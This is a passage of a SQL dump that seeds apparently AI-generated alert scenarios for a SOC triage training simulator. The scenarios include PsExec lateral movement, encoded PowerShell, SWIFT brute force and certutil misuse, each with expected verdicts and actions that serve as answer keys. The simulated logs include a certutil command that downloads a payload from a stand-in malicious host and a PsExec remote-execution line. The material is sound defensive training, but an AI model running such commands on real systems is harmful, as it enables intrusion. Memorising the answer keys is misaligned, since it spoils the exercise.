detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1405, 'False Positive: High Volume of Medical Record Access', 'medium', 'AWS GuardDuty', 'An employee accessed a high volume of medical records which initially appeared suspicious but was verified as part of routine duties.', 'Data Access', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T15:40:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.6.45\",\"dst_ip\":\"10.0.3.15\",\"username\":\"dr.jones\",\"hostname\":\"ehr-system\",\"request_body\":\"\",\"command_line\":\"python retrieve_records.py --batch 100\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python retrieve_records.py --batch 100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Routine script for batch processing of medical records\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_access\",\"analysis_notes\":\"The activity was part of scheduled data processing and does not indicate malicious intent.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 
100\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1406, 'False Positive: Unusual SSH Login Pattern', 'medium', 'Azure Defender', 'An unusual SSH login pattern was detected, but further investigation confirmed it was due to a scheduled maintenance task.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T16:22:34Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.7.55\",\"dst_ip\":\"10.0.4.25\",\"username\":\"maintainer\",\"hostname\":\"ssh-server\",\"request_body\":\"\",\"command_line\":\"ssh maintainer@10.0.4.25\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.7.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ssh maintainer@10.0.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled maintenance task\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The SSH login was due to scheduled maintenance, not unauthorized access. Verify the login against the change/maintenance schedule before closing. Note that the attached auth.log evidence also shows repeated Failed password entries for invalid user admin from 192.168.1.50; that activity is unrelated to the maintainer login and must be triaged separately, not closed together with this alert.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh 
maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1407, 'APT41 Lateral Movement Detected via PsExec', 'critical', 'KAPE', 'Lateral movement detected using PsExec from an internal IP to multiple hosts. This activity correlates with known APT41 techniques.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T03:15:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"192.168.1.107\",\"username\":\"finance_admin\",\"hostname\":\"finance-server02\",\"command_line\":\"PsExec.exe \\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PsExec is a legitimate signed Sysinternals tool, so file reputation alone is not conclusive; remote execution with explicit credentials (-u/-p) against another host is the lateral movement indicator here and is commonly associated with lateral movement attacks\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Activity matches APT41\'s known lateral movement using PsExec. 
Immediate action required to isolate affected systems.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1408, 'Suspicious PowerShell Activity with Encoded Commands', 'high', 'Velociraptor', 'An encoded PowerShell command was executed, potentially indicating a fileless malware attack.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T05:47:35Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.110\",\"username\":\"john.doe\",\"hostname\":\"workstation-jdoe\",\"command_line\":\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.110\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with suspicious PowerShell execution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are a common tactic for fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell execution is indicative of a potential fileless malware attack, requiring immediate isolation and further forensic analysis. First step: base64-decode the -enc argument (PowerShell -EncodedCommand is base64 of UTF-16LE text) to recover the actual command; -enc is also used by legitimate tooling, so the decoded content, the parent process and any network activity decide the verdict. block_hash only applies if a file artifact is recovered during forensics, since an encoded command line has no file hash of its own.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc 
JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1409, 'Detected SWIFT Network Attack Attempt', 'critical', 'FTK', 'Unauthorized login attempts detected on the SWIFT network indicating a potential breach attempt.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T02:22:11Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"swift_admin\",\"hostname\":\"swift-gateway\",\"failed_attempts\":35}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP, potential target of unauthorized access attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts from a known malicious IP suggest a brute force attack targeting the SWIFT network.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:54:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:53:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:52:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:51:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1410, 'Malicious LOLBin Activity Detected Using Certutil', 'high', 'Volatility', 'Certutil was used in a suspicious manner to download a potentially malicious file.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.20\",\"username\":\"malware_user\",\"hostname\":\"compromised-pc\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\temp\\\\payload.exe\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP executing suspicious command\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known malicious URL hosting malware payloads\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download and execute malicious 